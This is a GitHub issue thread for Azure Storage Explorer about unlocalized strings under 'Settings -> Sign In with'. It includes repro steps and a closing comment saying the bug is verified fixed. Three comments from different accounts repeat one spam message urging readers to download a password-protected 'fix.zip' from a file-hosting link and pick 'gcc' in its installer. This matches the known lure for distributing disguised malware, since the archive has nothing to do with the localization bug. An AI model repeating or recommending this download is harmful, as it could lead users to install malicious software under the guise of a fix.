### ISSUE TITLE
The strings in 'Settings -> Sign In with' part are not localized

### ISSUE THREAD

**Issue by v-xianya** [microsoft/AzureStorageExplorer#8150]
**Storage Explorer Version**: 1.35.0-dev (100)
**Build Number**: 20240728.1
**Branch**: main
**Platform/OS**: Windows11/Windows 10/Linux Ubuntu 22.04/MacOS Sonoma 14.6.1(Apple M1 Pro)
**Architecture**: arm64/x64/x64/arm64
**Reproduce Languages**: All
**How Found**: From running test cases
**Regression From**: Not a regression

## Steps to Reproduce ##
1. Launch Storage Explorer -> Open 'Settings' -> 'Application -> Regional Settings'.
2. Select 'français' -> Restart Storage Explorer.
3. Open 'Settings' -> Go to 'Application -> Sign In with'.
4. Check whether the strings are localized.

## Expected Experience ##
The strings are localized.

## Actual Experience ##
The strings are not localized.
![image](https://github.com/user-attachments/assets/6659d06e-93cd-41d1-b50f-dbebe7f74ffa)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by v-kellyluo** [comment]
Verified this issue on the build 20241021.1. Fixed. So, we are going to close it.
![Image](https://github.com/user-attachments/assets/bc08b0f2-23c4-4886-b523-eb976ad35952)
